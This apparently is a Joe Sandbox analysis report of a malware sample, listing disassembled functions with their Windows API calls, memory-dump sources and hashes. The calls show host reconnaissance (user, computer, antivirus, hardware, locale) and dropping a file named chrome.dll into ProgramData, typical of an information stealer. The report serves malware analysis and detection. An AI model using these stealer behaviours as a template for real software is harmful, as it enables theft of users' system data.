                                                                                                                                                                                                                                                          • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                                                          • Opcode ID: 0222365b310b4c94ecc564fb6400236815354d87fe7ccea5b2b0247d60bd6aba
                                                                                                                                                                                                                                                          • Instruction ID: b1491cbdb234ab022d5f7744c6cf58a4579ffe62dbee94a931730d4f27f057b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0222365b310b4c94ecc564fb6400236815354d87fe7ccea5b2b0247d60bd6aba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C118132A0011CABDB21EB65DC45BDD73B8AF04300F4004E1F745E7152DAB8AA849F94
                                                                                                                                                                                                                                                          Function 00FF133C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,010158F8,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF1354
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF135B
                                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00FF1377
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF139D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                          • String ID: %d MB
                                                                                                                                                                                                                                                          • API String ID: 3644086013-2651807785
                                                                                                                                                                                                                                                          • Opcode ID: e6e3c628b6c3b6b5392570ccbb00be824715df628ae05e43cb213b03729db32c
                                                                                                                                                                                                                                                          • Instruction ID: bec9a5005d44550c3457ec7fdc5a314a6823adeb63185daea72a408655eb34d5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e3c628b6c3b6b5392570ccbb00be824715df628ae05e43cb213b03729db32c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A018671A0021CAFDB14EFB4DC49ABE77B9FF45310F444429F702E7154DA7499419754
                                                                                                                                                                                                                                                          Function 6CD60C1A Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3136044242-0
                                                                                                                                                                                                                                                          • Opcode ID: 3dc2e959bc188f6f719b51a883135f28ef20d458b71779afb8285f07d49c3c85
                                                                                                                                                                                                                                                          • Instruction ID: 02931a539eb1ace30e987a0c5862781a2ffde8431318156084fe18523a33e264
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dc2e959bc188f6f719b51a883135f28ef20d458b71779afb8285f07d49c3c85
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05218072D012A9EBDB118F57C840EAF3A79EB816D8F118615E81967E64C730AD01CFE8
                                                                                                                                                                                                                                                          Function 00FE4AA7 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1274457161-0
                                                                                                                                                                                                                                                          • Opcode ID: e061b30dade2226901d817431af7fddb766b1f0dca4b3a7ffbe71be27172d02e
                                                                                                                                                                                                                                                          • Instruction ID: bae715f04b0de6a12fef26172cd5623ea69b989c88901462b1d67046b531753b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e061b30dade2226901d817431af7fddb766b1f0dca4b3a7ffbe71be27172d02e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9011E32D00218ABCF159FA9DC45ADEBFB8AF55730F108216F921F72A0D67456018F94
                                                                                                                                                                                                                                                          Function 00FF1174 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914), ref: 00FF1188
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF118F
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ), ref: 00FF11AD
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(01015870,00000000,00000000,00000000,000000FF,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000), ref: 00FF11C9
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF11D2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3466090806-0
                                                                                                                                                                                                                                                          • Opcode ID: e8c7faf72fdda26c0f0cc183d916f52df69dac110685a30b326f4c3baddf4059
                                                                                                                                                                                                                                                          • Instruction ID: e230247bd03a9bbad75a2e343ef92ad04671ca0ec32f9026b79f9509da70428d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8c7faf72fdda26c0f0cc183d916f52df69dac110685a30b326f4c3baddf4059
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F03075640205BFEB204B90EC0EFAE7ABEFB84700F144014F701A5198E7B159009B24
                                                                                                                                                                                                                                                          Function 00FF7074 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?), ref: 00FF70DB
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4198075804-0
                                                                                                                                                                                                                                                          • Opcode ID: 3114c9b2cc096f015566fafe3aaba5447a3d433a802cf7337f2e0cd1377291ca
                                                                                                                                                                                                                                                          • Instruction ID: d462efa753b94ba4068c7925a4676e7a5bfb1e86e265e7d5687366c49d2ae404
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3114c9b2cc096f015566fafe3aaba5447a3d433a802cf7337f2e0cd1377291ca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E421077680021DABCF10EF65EC458EEBBB8AF41314F008166FA01A7265DB34AA46DF90
                                                                                                                                                                                                                                                          Function 00FF2818 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00FEECA7,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2832
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2859
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2870
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                                                                                                          • Opcode ID: cc8e8962300f317f487fba321e0b77c0a4a6422050f10012619ab0328ffa1fa1
                                                                                                                                                                                                                                                          • Instruction ID: 5f60e84ef1dcb8890007e7c1aced85c579c5b61b01ac2f66d2f63ca89225d01c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc8e8962300f317f487fba321e0b77c0a4a6422050f10012619ab0328ffa1fa1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49F0307254011CBFDB516EA5EC8AEEB3B5CEF167D4F004122FA1296161D7A19D01BBA0
                                                                                                                                                                                                                                                          Function 00FF246D Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00FF3FC7,00000000,?), ref: 00FF248F
                                                                                                                                                                                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00FF24AA
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF24B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
